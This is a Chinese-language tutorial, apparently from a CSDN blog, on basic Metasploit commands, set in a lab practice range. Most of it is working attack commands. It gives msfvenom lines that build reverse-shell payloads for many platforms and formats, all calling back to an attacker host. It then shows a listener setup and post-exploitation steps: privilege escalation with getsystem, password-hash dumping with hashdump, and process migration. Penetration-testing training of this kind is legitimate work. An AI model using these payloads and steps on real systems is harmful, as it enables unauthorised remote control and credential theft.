metasploit之基础命令操作
作者:互联网
文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
metasploit基础命令操作
建立数据库:
msfdb init #对msf数据库进行初始化
service postgresql start #开启postgresql数据库
service postgresql status #查看状态
当我们需要使用msf进行一些扫描且需要记住扫描结果,需开启此数据库。
生成payload:
在msf上可以使用命令生成可执行文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe > msf.exe #反向reverse 正向bind
同样也是有php、asp、jsp、linux、war、python等等
#Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
#Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
#Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
#PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
#ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
#JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
#WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
#python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
#Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f raw > shell.sh
#Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
这里比较常用的就是windows,如果不加x64,默认是x86
生成可执行程序:其中-p就是payload。-f就是执行程序的类型,-o就是将全面的代码生成指定的文件名,同样>也是可以相同的作用。
建立监听:
开启监听,获取权限,权限查看:
set payload windows/x64/meterpreter/reverse_tcp #添加payload攻击载荷,这里根据生成可执行文件中的payload
set LHOST 10.10.10.128 #添加攻击机地址
show options #查看添加情况
set LPORT #添加攻击机端口 默认是4444,这根据你生成可执行文件中的端口来定
set RHOST #被攻击方地址 一般在正向连接中需要添加。
exploit && run #这两个命令都在可以执行上面的监听效果。
成功反弹:
但文件在被攻击方中运行后,会生成一个shell的session,此shell就是通过反向的方式让我们被攻击方来连接我们。
常用命令:
getuid #查看当前权限
getsystem #提权权限至system
background #将session保存至后台
sessions #查看当前会话。
进程迁移:
hashdump #导出hash
ps #查看进程,这里面我们就可以看到都有哪些权限的User运行了哪些进程。
migrate PID号 #迁移进程
当我们进行进程迁移后,就可以看出已将administrator权限提升至system权限。当我们有的时候不能够执行hashdump时,则需要迁移进程后再使用。
退回初始权限:
当进行权限提升后,同样可以使用命令退回之前的权限:
rev2self #退回至当前权限
当我们连接了数据库时,在msf中便会记录我们一些重要数据,当我们进行信息收集时,便于我们查看:
这里可以看出使用db_xxx便可以调用一些命令。
查看历史数据:
services #查看信息收集或执行命令后,留存的有用数据。
services -d 10.10.10.158 #删除数据。
db_nmap #调用nmap来进行内部扫描。
断开session:
同样可以关掉这条session :
sessions -k id号 #关闭session
标签:metasploit,shell,reverse,LHOST,tcp,LPORT,命令,msfvenom,操作 来源: https://blog.csdn.net/nicai321/article/details/122745903